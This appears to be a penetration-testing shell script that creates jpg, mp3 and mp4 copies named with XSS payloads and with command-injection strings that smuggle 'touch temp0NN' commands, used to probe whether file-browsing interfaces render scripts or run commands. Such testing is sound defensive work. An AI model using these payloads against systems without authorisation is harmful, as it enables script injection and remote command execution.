# For any system that uses a graphical interface to display files, here are a few test cases to check out. 
# Examples that might be vulnerable would be image gallaries, mp3 or mp4 libraries, storage systems, routers, etc... 

# For these you will need three files with valid data: 1.jpg 1.mp3 and 1.mp4

# These commands needs to be run from a command line that has access to the file system that the UI displays/manipulates.
# The commands will create a number of strangly named files that might results in either a XSS or a Command Injection (RCE). 

# This first batch will create a file with names that may have an XSS. 
# From a commandline, run the following to create a series of potential XSS jpg files and then
# from the UI, view and manipulate the files to see if they render the scripts.
cp 1.jpg javascript\:alert\(1\).jpg
cp 1.jpg \<script\ src\=data\:\,alert\(2\)\>.jpg
cp 1.jpg \<IFRAME\ SRC\=\"javascript\:alert\(3\)\;\"\>.jpg
cp 1.jpg \<svg\ onload\=alert\(4\)\>.jpg
cp 1.jpg \<script\>alert\(5\)\<\&\#47\;script\>.jpg
cp 1.jpg \<iframe\ src\=\"javascript\:alert\(6\)\"\>.jpg
cp 1.jpg \<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg
cp 1.jpg \<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg

cp 1.jpg a\>"\>\javascript\:alert\(11\).jpg
cp 1.jpg a\>"\>\<script\ src\=data\:\,alert\(12\)\>.jpg
cp 1.jpg a\>"\>\<IFRAME\ SRC\=\"javascript\:alert\(13\)\;\"\>.jpg
cp 1.jpg a\>"\>\<svg\ onload\=alert\(14\)\>.jpg
cp 1.jpg a\>"\>\<script\>alert\(15\)\<\&\#47\;script\>.jpg
cp 1.jpg a\>"\>\<iframe\ src\=\"javascript\:alert\(16\)\"\>.jpg
cp 1.jpg a\>"\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg
cp 1.jpg a\>"\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg

cp 1.jpg a\>\"\>\&\#8725\;--javascript\:alert\(21\).jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<script\ src\=data\:\,alert\(22\)\>.jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<IFRAME\ SRC\=\"javascript\:alert\(23\)\;\"\>.jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<svg\ onload\=alert\(24\)\>.jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<script\>alert\(25\)\<\&\#47\;script\>.jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<iframe\ src\=\"javascript\:alert\(26\)\"\>.jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg
cp 1.jpg a\>\"\>\&\#8725\;--\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg

cp 1.jpg a\"\<\&\#47\;div\>javascript\:alert\(31\).jpg
cp 1.jpg a\"\<\&\#47\;div\>\<script\ src\=data\:\,alert\(32\)\>.jpg
cp 1.jpg a\"\<\&\#47\;div\>\<IFRAME\ SRC\=\"javascript\:alert\(33\)\;\"\>.jpg
cp 1.jpg a\"\<\&\#47\;div\>\<svg\ onload\=alert\(34\)\>.jpg
cp 1.jpg a\"\<\&\#47\;div\>\<script\>alert\(35\)\<\&\#47\;script\>.jpg
cp 1.jpg a\"\<\&\#47\;div\>\<iframe\ src\=\"javascript\:alert\(36\)\"\>.jpg
cp 1.jpg a\"\<\&\#47\;div\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg
cp 1.jpg a\"\<\&\#47\;div\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.jpg

# This next set of .jpgs will attempt to see if the UI is vulnerable to an OS command injection
# From the UI, try to manipulate the files, copy, move, open, close, etc...
# Check to see if a file was created that starts with temp0*  If you find one, then your system is vulnerable. 
# To check for the file, from a terminal on the system, run the folllowing command from the base directory
# find . -name temp0*
cp 1.jpg 
cp 1.jpg a\|touch\ temp001\|\|\`touch\ temp002\`\ \#\&apos\;\ \|touch\ temp003\|\|\`touch\ temp004\`.jpg 
cp 1.jpg a\|touch\ temp006.jpg
cp 1.jpg a\|\`touch\ temp007\`.jpg
cp 1.jpg a\|\|\`touch\ temp008\`\ \#\&quot\;.jpg
cp 1.jpg a\|\|\`touch\ temp009\`.jpg
cp 1.jpg a\#\&apos\;\ \|touch\ temp010.jpg
cp 1.jpg a\&touch\ temp011.jpg
cp 1.jpg a\&\`touch\ temp012\`.jpg
cp 1.jpg a\&\&\`touch\ temp013\`.jpg
cp 1.jpg a\|\`touch\ temp014\`.jpg
cp 1.jpg a\'\`touch\ temp015\`\'.jpg
cp 1.jpg a\;touch\ temp016.jpg
cp 1.jpg a\;\`touch\ temp017\`.jpg
cp 1.jpg a\$\(touch\ temp018\).jpg
cp 1.jpg a\@\{\[system\ \"touch\ temp019\"\]\}.jpg
cp 1.jpg a\#\&quot\;\ \|touch\ temp020.jpg
cp 1.jpg a\&\(touch\ temp021\).jpg


# The following will look for XSS in mp3 file manipulation
cp 1.mp3 javascript\:alert\(1\).mp3
cp 1.mp3 \<script\ src\=data\:\,alert\(2\)\>.mp3
cp 1.mp3 \<IFRAME\ SRC\=\"javascript\:alert\(3\)\;\"\>.mp3
cp 1.mp3 \<svg\ onload\=alert\(4\)\>.mp3
cp 1.mp3 \<script\>alert\(5\)\<\&\#47\;script\>.mp3
cp 1.mp3 \<iframe\ src\=\"javascript\:alert\(6\)\"\>.mp3
cp 1.mp3 \<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3
cp 1.mp3 \<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3

cp 1.mp3 a\>"\>\javascript\:alert\(11\).mp3
cp 1.mp3 a\>"\>\<script\ src\=data\:\,alert\(12\)\>.mp3
cp 1.mp3 a\>"\>\<IFRAME\ SRC\=\"javascript\:alert\(13\)\;\"\>.mp3
cp 1.mp3 a\>"\>\<svg\ onload\=alert\(14\)\>.mp3
cp 1.mp3 a\>"\>\<script\>alert\(15\)\<\&\#47\;script\>.mp3
cp 1.mp3 a\>"\>\<iframe\ src\=\"javascript\:alert\(16\)\"\>.mp3
cp 1.mp3 a\>"\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3
cp 1.mp3 a\>"\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3

cp 1.mp3 a\>\"\>\&\#8725\;--javascript\:alert\(21\).mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<script\ src\=data\:\,alert\(22\)\>.mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<IFRAME\ SRC\=\"javascript\:alert\(23\)\;\"\>.mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<svg\ onload\=alert\(24\)\>.mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<script\>alert\(25\)\<\&\#47\;script\>.mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<iframe\ src\=\"javascript\:alert\(26\)\"\>.mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3
cp 1.mp3 a\>\"\>\&\#8725\;--\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3

cp 1.mp3 a\"\<\&\#47\;div\>javascript\:alert\(31\).mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<script\ src\=data\:\,alert\(32\)\>.mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<IFRAME\ SRC\=\"javascript\:alert\(33\)\;\"\>.mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<svg\ onload\=alert\(34\)\>.mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<script\>alert\(35\)\<\&\#47\;script\>.mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<iframe\ src\=\"javascript\:alert\(36\)\"\>.mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3
cp 1.mp3 a\"\<\&\#47\;div\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp3

# The following will look for Command Injection in mp3 file manipulation
cp 1.mp3 a\|touch\ temp001\|\|\`touch\ temp002\`\ \#\&apos\;\ \|touch\ temp003\|\|\`touch\ temp004\`.mp3 
cp 1.mp3 a\|touch\ temp006.mp3
cp 1.mp3 a\|\`touch\ temp007\`.mp3
cp 1.mp3 a\|\|\`touch\ temp008\`\ \#\&quot\;.mp3
cp 1.mp3 a\|\|\`touch\ temp009\`.mp3
cp 1.mp3 a\#\&apos\;\ \|touch\ temp010.mp3
cp 1.mp3 a\&touch\ temp011.mp3
cp 1.mp3 a\&\`touch\ temp012\`.mp3
cp 1.mp3 a\&\&\`touch\ temp013\`.mp3
cp 1.mp3 a\|\`touch\ temp014\`.mp3
cp 1.mp3 a\'\`touch\ temp015\`\'.mp3
cp 1.mp3 a\;touch\ temp016.mp3
cp 1.mp3 a\;\`touch\ temp017\`.mp3
cp 1.mp3 a\$\(touch\ temp018\).mp3
cp 1.mp3 a\@\{\[system\ \"touch\ temp019\"\]\}.mp3
cp 1.mp3 a\#\&quot\;\ \|touch\ temp020.mp3
cp 1.mp3 a\&\(touch\ temp021\).mp3

# The follwing will look for XSS in mp4 file manipulation
cp 1.mp4 javascript\:alert\(1\).mp4
cp 1.mp4 \<script\ src\=data\:\,alert\(2\)\>.mp4
cp 1.mp4 \<IFRAME\ SRC\=\"javascript\:alert\(3\)\;\"\>.mp4
cp 1.mp4 \<svg\ onload\=alert\(4\)\>.mp4
cp 1.mp4 \<script\>alert\(5\)\<\&\#47\;script\>.mp4
cp 1.mp4 \<iframe\ src\=\"javascript\:alert\(6\)\"\>.mp4
cp 1.mp4 \<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4
cp 1.mp4 \<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4

cp 1.mp4 a\>"\>\javascript\:alert\(11\).mp4
cp 1.mp4 a\>"\>\<script\ src\=data\:\,alert\(12\)\>.mp4
cp 1.mp4 a\>"\>\<IFRAME\ SRC\=\"javascript\:alert\(13\)\;\"\>.mp4
cp 1.mp4 a\>"\>\<svg\ onload\=alert\(14\)\>.mp4
cp 1.mp4 a\>"\>\<script\>alert\(15\)\<\&\#47\;script\>.mp4
cp 1.mp4 a\>"\>\<iframe\ src\=\"javascript\:alert\(16\)\"\>.mp4
cp 1.mp4 a\>"\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4
cp 1.mp4 a\>"\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4

cp 1.mp4 a\>\"\>\&\#8725\;--javascript\:alert\(21\).mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<script\ src\=data\:\,alert\(22\)\>.mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<IFRAME\ SRC\=\"javascript\:alert\(23\)\;\"\>.mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<svg\ onload\=alert\(24\)\>.mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<script\>alert\(25\)\<\&\#47\;script\>.mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<iframe\ src\=\"javascript\:alert\(26\)\"\>.mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4
cp 1.mp4 a\>\"\>\&\#8725\;--\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4

cp 1.mp4 a\"\<\&\#47\;div\>javascript\:alert\(31\).mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<script\ src\=data\:\,alert\(32\)\>.mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<IFRAME\ SRC\=\"javascript\:alert\(33\)\;\"\>.mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<svg\ onload\=alert\(34\)\>.mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<script\>alert\(35\)\<\&\#47\;script\>.mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<iframe\ src\=\"javascript\:alert\(36\)\"\>.mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4
cp 1.mp4 a\"\<\&\#47\;div\>\<iframe\ src\=\&\#47\;\&\#47\;youtube.com\&\#47\;embed\&\#47\;0tAc3LnE9A4\>\<\&\#47\;iframe\>.mp4

# The following will look for Command Injection in mp4 file manipulation
cp 1.mp4 a\|touch\ temp001\|\|\`touch\ temp002\`\ \#\&apos\;\ \|touch\ temp003\|\|\`touch\ temp004\`.mp4 
cp 1.mp4 a\|touch\ temp006.mp4
cp 1.mp4 a\|\`touch\ temp007\`.mp4
cp 1.mp4 a\|\|\`touch\ temp008\`\ \#\&quot\;.mp4
cp 1.mp4 a\|\|\`touch\ temp009\`.mp4
cp 1.mp4 a\#\&apos\;\ \|touch\ temp010.mp4
cp 1.mp4 a\&touch\ temp011.mp4
cp 1.mp4 a\&\`touch\ temp012\`.mp4
cp 1.mp4 a\&\&\`touch\ temp013\`.mp4
cp 1.mp4 a\|\`touch\ temp014\`.mp4
cp 1.mp4 a\'\`touch\ temp015\`\'.mp4
cp 1.mp4 a\;touch\ temp016.mp4
cp 1.mp4 a\;\`touch\ temp017\`.mp4
cp 1.mp4 a\$\(touch\ temp018\).mp4
cp 1.mp4 a\@\{\[system\ \"touch\ temp019\"\]\}.mp4
cp 1.mp4 a\#\&quot\;\ \|touch\ temp020.mp4
cp 1.mp4 a\&\(touch\ temp021\).mp4
